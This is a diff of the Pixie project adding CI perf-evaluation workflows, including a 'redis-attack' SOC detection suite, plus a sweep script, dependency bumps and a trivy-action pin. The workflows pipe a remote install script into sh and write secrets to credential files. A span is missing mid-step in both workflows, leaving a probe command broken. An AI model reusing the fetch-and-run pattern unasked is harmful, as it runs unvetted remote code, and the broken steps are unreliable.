diff --git a/.github/workflows/perf_clickhouse.yaml b/.github/workflows/perf_clickhouse.yaml new file mode 100644 index 00000000000..e3f34671652 --- /dev/null +++ b/.github/workflows/perf_clickhouse.yaml @@ -0,0 +1,158 @@ +--- +name: perf-eval-clickhouse +on: + workflow_dispatch: + inputs: + ref: + description: 'Branch or commit' + required: false + type: string + tags: + description: 'Tags (comma separated)' + required: false + type: string +permissions: + contents: read + packages: write +jobs: + get-dev-image-with-extras: + uses: ./.github/workflows/get_image.yaml + with: + image-base-name: "dev_image_with_extras" + ref: ${{ inputs.ref }} + + clickhouse-export-perf: + name: ClickHouse export perf eval + needs: get-dev-image-with-extras + runs-on: oracle-vm-16cpu-64gb-x86-64 + container: + image: ${{ needs.get-dev-image-with-extras.outputs.image-with-tag }} + options: --cap-add=NET_ADMIN --device=/dev/net/tun + steps: + - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.2.2 + with: + ref: ${{ inputs.ref }} + fetch-depth: 0 + - name: Add pwd to git safe dir + run: git config --global --add safe.directory `pwd` + - id: get-commit-sha + run: echo "commit-sha=$(git rev-parse --short HEAD)" >> $GITHUB_OUTPUT + + # TODO(ddelnano): swap TAILSCALE_AUTH_KEY for an OAuth client once one is + # provisioned in the k8sstormcenter tailnet. Use + # `tailscale/github-action@v2` with `oauth-client-id` and `oauth-secret` + # inputs (`TS_OAUTH_CLIENT_ID` / `TS_OAUTH_CLIENT_SECRET` secrets) so + # credentials rotate automatically instead of expiring on a fixed cadence. + - name: Start Tailscale sidecar + env: + TS_AUTHKEY: ${{ secrets.TAILSCALE_AUTH_KEY }} + run: | + curl -fsSL https://tailscale.com/install.sh | sh + mkdir -p /var/run/tailscale /var/lib/tailscale + tailscaled \ + --socket=/var/run/tailscale/tailscaled.sock \ + --state=/var/lib/tailscale/tailscaled.state & + until tailscale status --json >/dev/null 2>&1; do sleep 1; done + tailscale up \ + --authkey="${TS_AUTHKEY}" \ + --accept-routes \ + --hostname="pixie-perf-ci-${GITHUB_RUN_ID}" + + - name: Write kubeconfig + env: + KUBECONFIG_B64: ${{ secrets.KUBECONFIG_B64 }} + run: | + mkdir -p "${RUNNER_TEMP}" + echo "${KUBECONFIG_B64}" | base64 -d > "${RUNNER_TEMP}/kubeconfig" + chmod 600 "${RUNNER_TEMP}/kubeconfig" + + # Fail fast if Tailscale can't reach the cluster API, before the 2+ minute + # bazel/skaffold build wastes time. + - name: Tailscale connectivity probe + env: + KUBECONFIG: ${{ runner.temp }}/kubeconfig + run: | + tailscale status + tailscale netcheck + api_host="$(kubectl --kubeconfig="$KUBECONFIG" config view --minify -o jsonpath='{.clusters[0].cluster.server}' | sed -E 's|https?://||; s|/.*||')" + api_ip="${api_host%%:*}" + api_port="${api_host##*:}" + echo "--- tailscale ping ${api_ip} ---" + tailscale ping --c 3 --until-direct=false "${api_ip}" || true + echo "--- tcp probe ${api_ip}:${api_port} ---" + timeout 5 bash -c " /tmp/gcloud.json + chmod 600 /tmp/gcloud.json + echo "gcloud-creds=/tmp/gcloud.json" >> $GITHUB_OUTPUT + - name: Activate gcloud service account + env: + GOOGLE_APPLICATION_CREDENTIALS: ${{ steps.gcloud-creds.outputs.gcloud-creds }} + run: | + service_account="$(jq -r '.client_email' "$GOOGLE_APPLICATION_CREDENTIALS")" + gcloud auth activate-service-account "${service_account}" --key-file="$GOOGLE_APPLICATION_CREDENTIALS" + gcloud auth configure-docker + + - name: Log in to GHCR + env: + GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} + run: echo "${GH_TOKEN}" | docker login ghcr.io -u "${{ github.actor }}" --password-stdin + + - name: Build and install px CLI + run: | + bazel build --config=x86_64_sysroot //src/pixie_cli:px + install -m 0755 bazel-bin/src/pixie_cli/px_/px /usr/local/bin/px + px version + + - name: Run clickhouse-export perf + env: + PX_API_KEY: ${{ secrets.PX_API_KEY }} + GOOGLE_APPLICATION_CREDENTIALS: ${{ steps.gcloud-creds.outputs.gcloud-creds }} + KUBECONFIG: ${{ runner.temp }}/kubeconfig + run: | + bazel run //src/e2e_test/perf_tool:perf_tool -- run \ + --api_key="${PX_API_KEY}" \ + --cloud_addr=pixie.austrianopencloudcommunity.org:443 \ + --commit_sha="${{ steps.get-commit-sha.outputs.commit-sha }}" \ + --experiment_name=clickhouse-export \ + --suite=clickhouse-exec \ + --use_local_cluster \ + --export_backend=parquet-gcs \ + --gcs_bucket=k8sstormcenter-soc-perf \ + --container_repo=ghcr.io/k8sstormcenter \ + --prom_recorder_override 'clickhouse-operator=:k8ss-forensic' \ + --tags "${{ inputs.tags }}" + + - name: Upload skaffold stderr log + if: always() + uses: actions/upload-artifact@ea165f8d65b6e75b540449e92b4886f43607fa02 # v4.6.2 + with: + name: skaffold-stderr-${{ github.run_id }}-${{ github.run_attempt }} + path: ${{ runner.temp }}/skaffold-stderr.log + if-no-files-found: ignore + + - name: Deactivate gcloud service account + if: always() + run: gcloud auth revoke || true + + - name: Tailscale logout + if: always() + run: tailscale logout || true diff --git a/.github/workflows/perf_soc_attack.yaml b/.github/workflows/perf_soc_attack.yaml new file mode 100644 index 00000000000..38305c7890c --- /dev/null +++ b/.github/workflows/perf_soc_attack.yaml @@ -0,0 +1,159 @@ +--- +name: perf-eval-soc-attack +on: + workflow_dispatch: + inputs: + ref: + description: 'Branch or commit' + required: false + type: string + tags: + description: 'Tags (comma separated)' + required: false + type: string +permissions: + contents: read + packages: write +jobs: + get-dev-image-with-extras: + uses: ./.github/workflows/get_image.yaml + with: + image-base-name: "dev_image_with_extras" + ref: ${{ inputs.ref }} + + soc-attack-perf: + name: Sovereign SOC redis-attack perf eval + needs: get-dev-image-with-extras + runs-on: oracle-vm-16cpu-64gb-x86-64 + container: + image: ${{ needs.get-dev-image-with-extras.outputs.image-with-tag }} + options: --cap-add=NET_ADMIN --device=/dev/net/tun + steps: + - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.2.2 + with: + ref: ${{ inputs.ref }} + fetch-depth: 0 + - name: Add pwd to git safe dir + run: git config --global --add safe.directory `pwd` + - id: get-commit-sha + run: echo "commit-sha=$(git rev-parse --short HEAD)" >> $GITHUB_OUTPUT + + # TODO(ddelnano): swap TAILSCALE_AUTH_KEY for an OAuth client once one is + # provisioned in the k8sstormcenter tailnet. Use + # `tailscale/github-action@v2` with `oauth-client-id` and `oauth-secret` + # inputs (`TS_OAUTH_CLIENT_ID` / `TS_OAUTH_CLIENT_SECRET` secrets) so + # credentials rotate automatically instead of expiring on a fixed cadence. + - name: Start Tailscale sidecar + env: + TS_AUTHKEY: ${{ secrets.TAILSCALE_AUTH_KEY }} + run: | + curl -fsSL https://tailscale.com/install.sh | sh + mkdir -p /var/run/tailscale /var/lib/tailscale + tailscaled \ + --socket=/var/run/tailscale/tailscaled.sock \ + --state=/var/lib/tailscale/tailscaled.state & + until tailscale status --json >/dev/null 2>&1; do sleep 1; done + tailscale up \ + --authkey="${TS_AUTHKEY}" \ + --accept-routes \ + --hostname="pixie-perf-ci-${GITHUB_RUN_ID}" + + - name: Write kubeconfig + env: + KUBECONFIG_B64: ${{ secrets.KUBECONFIG_B64 }} + run: | + mkdir -p "${RUNNER_TEMP}" + echo "${KUBECONFIG_B64}" | base64 -d > "${RUNNER_TEMP}/kubeconfig" + chmod 600 "${RUNNER_TEMP}/kubeconfig" + + # Fail fast if Tailscale can't reach the cluster API, before the 2+ minute + # bazel/skaffold build wastes time. + - name: Tailscale connectivity probe + env: + KUBECONFIG: ${{ runner.temp }}/kubeconfig + run: | + tailscale status + tailscale netcheck + api_host="$(kubectl --kubeconfig="$KUBECONFIG" config view --minify -o jsonpath='{.clusters[0].cluster.server}' | sed -E 's|https?://||; s|/.*||')" + api_ip="${api_host%%:*}" + api_port="${api_host##*:}" + echo "--- tailscale ping ${api_ip} ---" + tailscale ping --c 3 --until-direct=false "${api_ip}" || true + echo "--- tcp probe ${api_ip}:${api_port} ---" + timeout 5 bash -c " /tmp/gcloud.json + chmod 600 /tmp/gcloud.json + echo "gcloud-creds=/tmp/gcloud.json" >> $GITHUB_OUTPUT + - name: Activate gcloud service account + env: + GOOGLE_APPLICATION_CREDENTIALS: ${{ steps.gcloud-creds.outputs.gcloud-creds }} + run: | + service_account="$(jq -r '.client_email' "$GOOGLE_APPLICATION_CREDENTIALS")" + gcloud auth activate-service-account "${service_account}" --key-file="$GOOGLE_APPLICATION_CREDENTIALS" + gcloud auth configure-docker + + - name: Log in to GHCR + env: + GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} + run: echo "${GH_TOKEN}" | docker login ghcr.io -u "${{ github.actor }}" --password-stdin + + - name: Build and install px CLI + run: | + bazel build --config=x86_64_sysroot //src/pixie_cli:px + install -m 0755 bazel-bin/src/pixie_cli/px_/px /usr/local/bin/px + px version + + # The sovereign-soc suite installs Kubescape + Vector on the experiment + # cluster as part of the run (see KubescapeVectorWorkload). The + # kubescape-operator chart is pre-rendered under + # src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/helm-rendered/ + # and applied via PrerenderedDeploy, so no extra ./scripts step is needed. + # + # ClickHouse operator metrics are scraped on the forensic cluster via + # the prom_recorder_override; the kubescape node-agent prom recorder + # is intentionally NOT overridden — kubescape runs on the experiment + # cluster (where redis+bobctl drive traffic), so the recorder uses the + # default kubeconfig. + - name: Run sovereign-soc redis-attack perf + env: + PX_API_KEY: ${{ secrets.PX_API_KEY }} + GOOGLE_APPLICATION_CREDENTIALS: ${{ steps.gcloud-creds.outputs.gcloud-creds }} + KUBECONFIG: ${{ runner.temp }}/kubeconfig + SOC_VIZIER_EXISTING: "1" + run: | + bazel run //src/e2e_test/perf_tool:perf_tool -- run \ + --api_key="${PX_API_KEY}" \ + --cloud_addr=pixie.austrianopencloudcommunity.org:443 \ + --commit_sha="${{ steps.get-commit-sha.outputs.commit-sha }}" \ + --experiment_name=redis-attack \ + --suite=sovereign-soc \ + --use_local_cluster \ + --export_backend=parquet-gcs \ + --gcs_bucket=k8sstormcenter-soc-perf \ + --container_repo=ghcr.io/k8sstormcenter \ + --prom_recorder_override 'clickhouse-operator=:k8ss-forensic' \ + --max_retries=1 \ + --tags "${{ inputs.tags }}" + + - name: Tailscale logout + if: always() + run: tailscale logout || true diff --git a/.github/workflows/trivy_fs.yaml b/.github/workflows/trivy_fs.yaml index 6e43472a835..b1edec30f2f 100644 --- a/.github/workflows/trivy_fs.yaml +++ b/.github/workflows/trivy_fs.yaml @@ -23,7 +23,9 @@ jobs: security-events: write steps: - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.2.2 - - uses: aquasecurity/trivy-action@18f2510ee396bbf400402947b394f2dd8c87dbb0 # v0.29.0 + # v0.36.0 released 2026-04-22 (post-incident). Internally SHA-pins + # setup-trivy@3fb12ec = Aqua's safe v0.2.6 per GHSA-69fq-xp46-6x23. + - uses: aquasecurity/trivy-action@ed142fd0673e97e23eac54620cfb913e5ce36c25 # v0.36.0 with: scan-type: 'fs' ignore-unfixed: true diff --git a/chained-sweep.sh b/chained-sweep.sh new file mode 100755 index 00000000000..e20afa45e46 --- /dev/null +++ b/chained-sweep.sh @@ -0,0 +1,48 @@ +#!/usr/bin/env bash +# chained-sweep.sh — wait for an in-flight perf-sweep to finish, then kick +# off a second (independent) sweep into a fresh /tmp/perf-sweep-/ dir +# with its own watcher. Use this when you want a clean before/after pair +# without having to be at the keyboard when the first one ends. +# +# Usage: +# ./chained-sweep.sh +# ./chained-sweep.sh /tmp/perf-sweep-20260514-114224 +set -euo pipefail + +FIRST="${1:?need path to first sweep dir}" +LOG=/tmp/chained-sweep.log +exec > >(tee -a "$LOG") 2>&1 + +echo "$(date -Is) waiting for first sweep to finish: $FIRST" +# perf-sweep.sh writes "sweep complete in N s — " as the last line +# of sweep.log when all multipliers landed. +while ! grep -q "sweep complete" "$FIRST/sweep.log" 2>/dev/null; do + sleep 30 +done +echo "$(date -Is) first sweep finished" + +# Kick off second sweep (perf-sweep.sh creates its own timestamped dir). +# Tag the sweep.log with a header so it's obvious in the watcher output +# that this is the "after" run. +echo "$(date -Is) launching second sweep" +/home/constanze/code/pixie/perf-sweep.sh > /tmp/perf-sweep-second.stdout 2>&1 & +SWEEP_PID=$! + +# Give perf-sweep.sh a moment to create its dir + sweep.log. +sleep 8 +NEW=$(ls -dt /tmp/perf-sweep-2*/ 2>/dev/null | head -1) +NEW="${NEW%/}" +if [[ -z "$NEW" || "$NEW" == "$FIRST" ]]; then + echo "$(date -Is) ERROR: second sweep dir not detected" + exit 1 +fi +echo "$(date -Is) second sweep dir: $NEW" + +# Watcher for the new sweep (auto-exits when its sweep.log shows complete). +setsid bash /home/constanze/code/pixie/render-sweep-watch.sh "$NEW" \ + /tmp/render-watch-second.log 2>&1 & +disown +echo "$(date -Is) watcher launched for $NEW" + +wait "$SWEEP_PID" +echo "$(date -Is) second sweep done" diff --git a/docker.properties b/docker.properties index bb7696c727f..4633b5f35bf 100644 --- a/docker.properties +++ b/docker.properties @@ -1,4 +1,4 @@ -DOCKER_IMAGE_TAG=202512082352 -LINTER_IMAGE_DIGEST=441fc5a65697dab0b38627d5afde9e38da6812f1a5b98732b224161c23238e73 -DEV_IMAGE_DIGEST=cac2e8a1c3e70dde4e5089b2383b2e11cc022af467ee430c12416eb42066fbb7 -DEV_IMAGE_WITH_EXTRAS_DIGEST=e84f82d62540e1ca72650f8f7c9c4fe0b32b64a33f04cf0b913b9961527c9e30 +DOCKER_IMAGE_TAG=202604270358 +LINTER_IMAGE_DIGEST=af984e837756bce44089d0f977146aee989b24a12884ba2366b4e6eaf19d9acb +DEV_IMAGE_DIGEST=e4aec14294cff907e7dc3c4835950a4e166e503d32cae082418971e7f70d86bc +DEV_IMAGE_WITH_EXTRAS_DIGEST=331a2391941c589d2b6536ae49794460b1097c482a45a11029d96a7d0d8d8030 diff --git a/go.mod b/go.mod index 4224503b9c1..10f19e7657b 100644 --- a/go.mod +++ b/go.mod @@ -52,6 +52,7 @@ require ( github.com/ory/dockertest/v3 v3.8.1 github.com/ory/hydra-client-go v1.9.2 github.com/ory/kratos-client-go v0.10.1 + github.com/parquet-go/parquet-go v0.25.1 github.com/phayes/freeport v0.0.0-20171002181615-b8543db493a5 github.com/prometheus/client_golang v1.14.0 github.com/prometheus/client_model v0.3.0 @@ -115,6 +116,7 @@ require ( github.com/VividCortex/ewma v1.1.1 // indirect github.com/a8m/envsubst v1.3.0 // indirect github.com/alecthomas/participle/v2 v2.0.0-beta.5 // indirect + github.com/andybalholm/brotli v1.1.0 // indirect github.com/andybalholm/cascadia v1.1.0 // indirect github.com/asaskevich/govalidator v0.0.0-20230301143203-a9d515a09cc2 // indirect github.com/beorn7/perks v1.0.1 // indirect @@ -171,7 +173,7 @@ require ( github.com/google/go-querystring v1.1.0 // indirect github.com/google/gofuzz v1.2.0 // indirect github.com/google/shlex v0.0.0-20191202100458-e7afc7fbc510 // indirect - github.com/google/uuid v1.3.0 // indirect + github.com/google/uuid v1.6.0 // indirect github.com/googleapis/gax-go/v2 v2.7.0 // indirect github.com/gorilla/securecookie v1.1.1 // indirect github.com/gorilla/websocket v1.5.0 // indirect @@ -191,7 +193,7 @@ require ( github.com/json-iterator/go v1.1.12 // indirect github.com/jstemmer/go-junit-report v0.9.1 // indirect github.com/kevinburke/ssh_config v0.0.0-20190725054713-01f96b0aa0cd // indirect - github.com/klauspost/compress v1.17.2 // indirect + github.com/klauspost/compress v1.17.9 // indirect github.com/kr/pretty v0.2.1 // indirect github.com/kr/text v0.2.0 // indirect github.com/kylelemons/godebug v1.1.0 // indirect @@ -232,6 +234,7 @@ require ( github.com/patrickmn/go-cache v2.1.0+incompatible // indirect github.com/pelletier/go-toml v1.9.3 // indirect github.com/peterbourgon/diskv v2.0.1+incompatible // indirect + github.com/pierrec/lz4/v4 v4.1.21 // indirect github.com/pkg/errors v0.9.1 // indirect github.com/pmezard/go-difflib v1.0.0 // indirect github.com/prometheus/procfs v0.9.0 // indirect @@ -276,7 +279,7 @@ require ( golang.org/x/xerrors v0.0.0-20220907171357-04be3eba64a2 // indirect gomodules.xyz/jsonpatch/v2 v2.2.0 // indirect google.golang.org/appengine v1.6.7 // indirect - google.golang.org/protobuf v1.29.1 // indirect + google.golang.org/protobuf v1.34.2 // indirect gopkg.in/inf.v0 v0.9.1 // indirect gopkg.in/ini.v1 v1.67.0 // indirect gopkg.in/launchdarkly/go-jsonstream.v1 v1.0.1 // indirect @@ -317,3 +320,5 @@ replace ( google.golang.org/grpc => google.golang.org/grpc v1.43.0 gopkg.in/yaml.v2 => gopkg.in/yaml.v2 v2.4.0 ) + +replace google.golang.org/protobuf => google.golang.org/protobuf v1.29.1 diff --git a/go.sum b/go.sum index b8697cb4add..533a9f3f9b6 100644 --- a/go.sum +++ b/go.sum @@ -87,6 +87,8 @@ github.com/alecthomas/template v0.0.0-20190718012654-fb15b899a751/go.mod h1:LOuy github.com/alecthomas/units v0.0.0-20151022065526-2efee857e7cf/go.mod h1:ybxpYRFXyAe+OPACYpWeL0wqObRcbAqCMya13uyzqw0= github.com/alecthomas/units v0.0.0-20190717042225-c3de453c63f4/go.mod h1:ybxpYRFXyAe+OPACYpWeL0wqObRcbAqCMya13uyzqw0= github.com/alecthomas/units v0.0.0-20190924025748-f65c72e2690d/go.mod h1:rBZYJk541a8SKzHPHnH3zbiI+7dagKZ0cgpgrD7Fyho= +github.com/andybalholm/brotli v1.1.0 h1:eLKJA0d02Lf0mVpIDgYnqXcUn0GqVmEFny3VuID1U3M= +github.com/andybalholm/brotli v1.1.0/go.mod h1:sms7XGricyQI9K10gOSf56VKKWS4oLer58Q+mhRPtnY= github.com/andybalholm/cascadia v1.1.0 h1:BuuO6sSfQNFRu1LppgbD25Hr2vLYW25JvxHs5zzsLTo= github.com/andybalholm/cascadia v1.1.0/go.mod h1:GsXiBklL0woXo1j/WYWtSYYC4ouU9PqHO0sqidkEA4Y= github.com/anmitsu/go-shlex v0.0.0-20161002113705-648efa622239 h1:kFOfPq6dUM1hTo4JG6LR5AXSUEsOjtdm0kw0FtQtMJA= @@ -447,8 +449,8 @@ github.com/google/shlex v0.0.0-20191202100458-e7afc7fbc510 h1:El6M4kTTCOh6aBiKaU github.com/google/shlex v0.0.0-20191202100458-e7afc7fbc510/go.mod h1:pupxD2MaaD3pAXIBCelhxNneeOaAeabZDe5s4K6zSpQ= github.com/google/uuid v1.1.1/go.mod h1:TIyPZe4MgqvfeYDBFedMoGGpEw/LqOeaOT+nhxU+yHo= github.com/google/uuid v1.1.2/go.mod h1:TIyPZe4MgqvfeYDBFedMoGGpEw/LqOeaOT+nhxU+yHo= -github.com/google/uuid v1.3.0 h1:t6JiXgmwXMjEs8VusXIJk2BXHsn+wx8BZdTaoZ5fu7I= -github.com/google/uuid v1.3.0/go.mod h1:TIyPZe4MgqvfeYDBFedMoGGpEw/LqOeaOT+nhxU+yHo= +github.com/google/uuid v1.6.0 h1:NIvaJDMOsjHA8n1jAhLSgzrAzy1Hgr+hNrb57e+94F0= +github.com/google/uuid v1.6.0/go.mod h1:TIyPZe4MgqvfeYDBFedMoGGpEw/LqOeaOT+nhxU+yHo= github.com/googleapis/gax-go/v2 v2.0.5/go.mod h1:DWXyrwAJ9X0FpwwEdw+IPEYBICEFu5mhpdKc/us6bOk= github.com/googleapis/gax-go/v2 v2.7.0 h1:IcsPKeInNvYi7eqSaDjiZqDDKu5rsmunY0Y1YupQSSQ= github.com/googleapis/gax-go/v2 v2.7.0/go.mod h1:TEop28CZZQ2y+c0VxMUmu1lV+fQx57QpBWsYpwqHJx8= @@ -579,8 +581,8 @@ github.com/klauspost/compress v1.8.2/go.mod h1:RyIbtBH6LamlWaDj8nUwkbUhJ87Yi3uG0 github.com/klauspost/compress v1.9.0/go.mod h1:RyIbtBH6LamlWaDj8nUwkbUhJ87Yi3uG0guNDohfE1A= github.com/klauspost/compress v1.9.5/go.mod h1:RyIbtBH6LamlWaDj8nUwkbUhJ87Yi3uG0guNDohfE1A= github.com/klauspost/compress v1.13.6/go.mod h1:/3/Vjq9QcHkK5uEr5lBEmyoZ1iFhe47etQ6QUkpK6sk= -github.com/klauspost/compress v1.17.2 h1:RlWWUY/Dr4fL8qk9YG7DTZ7PDgME2V4csBXA8L/ixi4= -github.com/klauspost/compress v1.17.2/go.mod h1:ntbaceVETuRiXiv4DpjP66DpAtAGkEQskQzEyD//IeE= +github.com/klauspost/compress v1.17.9 h1:6KIumPrER1LHsvBVuDa0r5xaG0Es51mhhB9BQB2qeMA= +github.com/klauspost/compress v1.17.9/go.mod h1:Di0epgTjJY877eYKx5yC51cX2A2Vl2ibi7bDH9ttBbw= github.com/klauspost/cpuid v1.2.1/go.mod h1:Pj4uuM528wm8OyEC2QMXAi2YiTZ96dNQPGgoMS4s3ek= github.com/konsorten/go-windows-terminal-sequences v1.0.1/go.mod h1:T0+1ngSBFLxvqU3pZ+m/2kptfBszLMUkC4ZK/EgS/cQ= github.com/konsorten/go-windows-terminal-sequences v1.0.2/go.mod h1:T0+1ngSBFLxvqU3pZ+m/2kptfBszLMUkC4ZK/EgS/cQ= @@ -775,6 +777,8 @@ github.com/ory/hydra-client-go v1.9.2 h1:sbp+8zwEJvhqSxcY8HiOkXeY2FspsfSOJ5ajJ07 github.com/ory/hydra-client-go v1.9.2/go.mod h1:TTg4Gt0SDC8+XoGtj5qzdtqxapfFW+Vmm41PFuC6n/E= github.com/ory/kratos-client-go v0.10.1 h1:kSRk+0leCJ1nPMS+FPho8b9WMzrKNpgszvta0Xo32QU= github.com/ory/kratos-client-go v0.10.1/go.mod h1:dOQIsar76K07wMPJD/6aMhrWyY+sFGEagLDLso1CpsA= +github.com/parquet-go/parquet-go v0.25.1 h1:l7jJwNM0xrk0cnIIptWMtnSnuxRkwq53S+Po3KG8Xgo= +github.com/parquet-go/parquet-go v0.25.1/go.mod h1:AXBuotO1XiBtcqJb/FKFyjBG4aqa3aQAAWF3ZPzCanY= github.com/pascaldekloe/goe v0.0.0-20180627143212-57f6aae5913c/go.mod h1:lzWF7FIEvWOWxwDKqyGYQf6ZUaNfKdP144TG7ZOy1lc= github.com/patrickmn/go-cache v2.1.0+incompatible h1:HRMgzkcYKYpi3C8ajMPV8OFXaaRUnok+kx1WdO15EQc= github.com/patrickmn/go-cache v2.1.0+incompatible/go.mod h1:3Qf8kWWT7OJRJbdiICTKqZju1ZixQ/KpMGzzAfe6+WQ= @@ -788,6 +792,8 @@ github.com/peterbourgon/diskv v2.0.1+incompatible h1:UBdAOUP5p4RWqPBg048CAvpKN+v github.com/peterbourgon/diskv v2.0.1+incompatible/go.mod h1:uqqh8zWWbv1HBMNONnaR/tNboyR3/BZd58JJSHlUSCU= github.com/phayes/freeport v0.0.0-20171002181615-b8543db493a5 h1:rZQtoozkfsiNs36c7Tdv/gyGNzD1X1XWKO8rptVNZuM= github.com/phayes/freeport v0.0.0-20171002181615-b8543db493a5/go.mod h1:iIss55rKnNBTvrwdmkUpLnDpZoAHvWaiq5+iMmen4AE= +github.com/pierrec/lz4/v4 v4.1.21 h1:yOVMLb6qSIDP67pl/5F7RepeKYu/VmTyEXvuMI5d9mQ= +github.com/pierrec/lz4/v4 v4.1.21/go.mod h1:gZWDp/Ze/IJXGXf23ltt2EXimqmTUXEy0GFuRQyBid4= github.com/pingcap/errors v0.11.4 h1:lFuQV/oaUMGcD2tqt+01ROSmJs75VG1ToEOkZIZ4nE4= github.com/pingcap/errors v0.11.4/go.mod h1:Oi8TUi2kEtXXLMJk9l1cGmz20kV3TaQ0usTwv5KuLY8= github.com/pkg/diff v0.0.0-20210226163009-20ebb0f2a09e h1:aoZm08cpOy4WuID//EZDgcC4zIxODThtZNPirFr42+A= @@ -1327,10 +1333,6 @@ google.golang.org/genproto v0.0.0-20211208223120-3a66f561d7aa h1:I0YcKz0I7OAhddo google.golang.org/genproto v0.0.0-20211208223120-3a66f561d7aa/go.mod h1:5CzLGKJ67TSI2B9POpiiyGha0AjJvZIUgRMt1dSmuhc= google.golang.org/grpc v1.43.0 h1:Eeu7bZtDZ2DpRCsLhUlcrLnvYaMK1Gz86a+hMVvELmM= google.golang.org/grpc v1.43.0/go.mod h1:k+4IHHFw41K8+bbowsex27ge2rCb65oeWqe4jJ590SU= -google.golang.org/protobuf v1.23.0/go.mod h1:EGpADcykh3NcUnDUJcl1+ZksZNG86OlYog2l/sGQquU= -google.golang.org/protobuf v1.25.0/go.mod h1:9JNX74DMeImyA3h4bdi1ymwjUzf21/xIlbajtzgsN7c= -google.golang.org/protobuf v1.26.0/go.mod h1:9q0QmTI4eRPtz6boOQmLYwt+qCgq0jsYwAQnmE0givc= -google.golang.org/protobuf v1.27.1/go.mod h1:9q0QmTI4eRPtz6boOQmLYwt+qCgq0jsYwAQnmE0givc= google.golang.org/protobuf v1.29.1 h1:7QBf+IK2gx70Ap/hDsOmam3GE0v9HicjfEdAxE62UoM= google.golang.org/protobuf v1.29.1/go.mod h1:HV8QOd/L58Z+nl8r43ehVNZIU/HEI6OcFqwMG9pJV4I= gopkg.in/alecthomas/kingpin.v2 v2.2.6/go.mod h1:FMv+mEhP44yOT+4EoQTLFTRgOQ1FBLkstjWtayDeSgw= diff --git a/go_deps.bzl b/go_deps.bzl index 6590dff5052..8ff37dbcbf6 100644 --- a/go_deps.bzl +++ b/go_deps.bzl @@ -156,8 +156,8 @@ def pl_go_dependencies(): name = "com_github_andybalholm_brotli", build_directives = ["gazelle:map_kind go_binary pl_go_binary @px//bazel:pl_build_system.bzl", "gazelle:map_kind go_test pl_go_test @px//bazel:pl_build_system.bzl"], importpath = "github.com/andybalholm/brotli", - sum = "h1:8uQZIdzKmjc/iuPu7O2ioW48L81FgatrcpfFmiq/cCs=", - version = "v1.0.5", + sum = "h1:eLKJA0d02Lf0mVpIDgYnqXcUn0GqVmEFny3VuID1U3M=", + version = "v1.1.0", ) go_repository( name = "com_github_andybalholm_cascadia", @@ -1628,8 +1628,8 @@ def pl_go_dependencies(): name = "com_github_google_uuid", build_directives = ["gazelle:map_kind go_binary pl_go_binary @px//bazel:pl_build_system.bzl", "gazelle:map_kind go_test pl_go_test @px//bazel:pl_build_system.bzl"], importpath = "github.com/google/uuid", - sum = "h1:t6JiXgmwXMjEs8VusXIJk2BXHsn+wx8BZdTaoZ5fu7I=", - version = "v1.3.0", + sum = "h1:NIvaJDMOsjHA8n1jAhLSgzrAzy1Hgr+hNrb57e+94F0=", + version = "v1.6.0", ) go_repository( name = "com_github_googleapis_enterprise_certificate_proxy", @@ -2282,8 +2282,8 @@ def pl_go_dependencies(): name = "com_github_klauspost_compress", build_directives = ["gazelle:map_kind go_binary pl_go_binary @px//bazel:pl_build_system.bzl", "gazelle:map_kind go_test pl_go_test @px//bazel:pl_build_system.bzl"], importpath = "github.com/klauspost/compress", - sum = "h1:RlWWUY/Dr4fL8qk9YG7DTZ7PDgME2V4csBXA8L/ixi4=", - version = "v1.17.2", + sum = "h1:6KIumPrER1LHsvBVuDa0r5xaG0Es51mhhB9BQB2qeMA=", + version = "v1.17.9", ) go_repository( name = "com_github_klauspost_cpuid", @@ -2992,6 +2992,13 @@ def pl_go_dependencies(): sum = "h1:mvZaddk4E4kLcXhzb+cxBsMPYp2pHqiQpWYkInsuZPQ=", version = "v1.3.0", ) + go_repository( + name = "com_github_parquet_go_parquet_go", + build_directives = ["gazelle:map_kind go_binary pl_go_binary @px//bazel:pl_build_system.bzl", "gazelle:map_kind go_test pl_go_test @px//bazel:pl_build_system.bzl"], + importpath = "github.com/parquet-go/parquet-go", + sum = "h1:l7jJwNM0xrk0cnIIptWMtnSnuxRkwq53S+Po3KG8Xgo=", + version = "v0.25.1", + ) go_repository( name = "com_github_pascaldekloe_goe", build_directives = ["gazelle:map_kind go_binary pl_go_binary @px//bazel:pl_build_system.bzl", "gazelle:map_kind go_test pl_go_test @px//bazel:pl_build_system.bzl"], @@ -3041,6 +3048,13 @@ def pl_go_dependencies(): sum = "h1:rZQtoozkfsiNs36c7Tdv/gyGNzD1X1XWKO8rptVNZuM=", version = "v0.0.0-20171002181615-b8543db493a5", ) + go_repository( + name = "com_github_pierrec_lz4_v4", + build_directives = ["gazelle:map_kind go_binary pl_go_binary @px//bazel:pl_build_system.bzl", "gazelle:map_kind go_test pl_go_test @px//bazel:pl_build_system.bzl"], + importpath = "github.com/pierrec/lz4/v4", + sum = "h1:yOVMLb6qSIDP67pl/5F7RepeKYu/VmTyEXvuMI5d9mQ=", + version = "v4.1.21", + ) go_repository( name = "com_github_pingcap_errors", build_directives = ["gazelle:map_kind go_binary pl_go_binary @px//bazel:pl_build_system.bzl", "gazelle:map_kind go_test pl_go_test @px//bazel:pl_build_system.bzl"], @@ -4427,6 +4441,7 @@ def pl_go_dependencies(): name = "org_golang_google_protobuf", build_directives = ["gazelle:map_kind go_binary pl_go_binary @px//bazel:pl_build_system.bzl", "gazelle:map_kind go_test pl_go_test @px//bazel:pl_build_system.bzl"], importpath = "google.golang.org/protobuf", + replace = "google.golang.org/protobuf", sum = "h1:7QBf+IK2gx70Ap/hDsOmam3GE0v9HicjfEdAxE62UoM=", version = "v1.29.1", ) diff --git a/k8s/vizier/bootstrap/adaptive_export_deployment.yaml b/k8s/vizier/bootstrap/adaptive_export_deployment.yaml index dcb9305bbb4..5d091f2c989 100644 --- a/k8s/vizier/bootstrap/adaptive_export_deployment.yaml +++ b/k8s/vizier/bootstrap/adaptive_export_deployment.yaml @@ -18,17 +18,12 @@ spec: nodeAffinity: requiredDuringSchedulingIgnoredDuringExecution: nodeSelectorTerms: + # The beta.kubernetes.io/os label has been deprecated since + # k8s v1.14; every modern kubelet sets kubernetes.io/os. The + # single term below is enough — kept both ORed terms in the + # 